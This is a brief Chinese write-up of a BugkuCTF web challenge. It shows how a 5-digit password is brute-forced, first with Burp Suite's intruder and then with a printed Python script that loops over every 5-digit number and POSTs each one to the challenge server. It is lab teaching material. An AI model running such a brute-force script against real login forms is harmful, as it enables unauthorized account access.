BugkuCTF-Web14-click me? no

打开题目环境,发现需要密码访问。

BugkuCTF-Web15-好像需要密码 - 图1

开启Burp抓包

BugkuCTF-Web15-好像需要密码 - 图2

发送到爆破模块,设置密码为5位数字。

BugkuCTF-Web15-好像需要密码 - 图3

Start attack,获得flag。

BugkuCTF-Web15-好像需要密码 - 图4

此外,此题还可以使用Python进行爆破,参考大神https://blog.csdn.net/m0_51641607/article/details/博客,Python脚本如下:

  1. # coding:gbk
  2. import requests
  3. def baopo():
  4. url = "http://114.67.246.176:17057/"
  5. for pwd in range(10000,100000):
  6. pwd = str(pwd)
  7. r = requests.post(url, data={'pwd': pwd})
  8. r.encoding = 'utf-8'
  9. r_text = r.text
  10. judge = "密码不正确,请重新输入"
  11. if (judge in r.text):
  12. print("尝试密码:{},反应状态码:{},密码错误.".format(pwd, r))
  13. else:
  14. print("尝试密码:{},反应状态码:{},密码正确.".format(pwd, r))
  15. print("爆破完成")
  16. break
  17. baopo()

运行爆出密码

BugkuCTF-Web15-好像需要密码 - 图5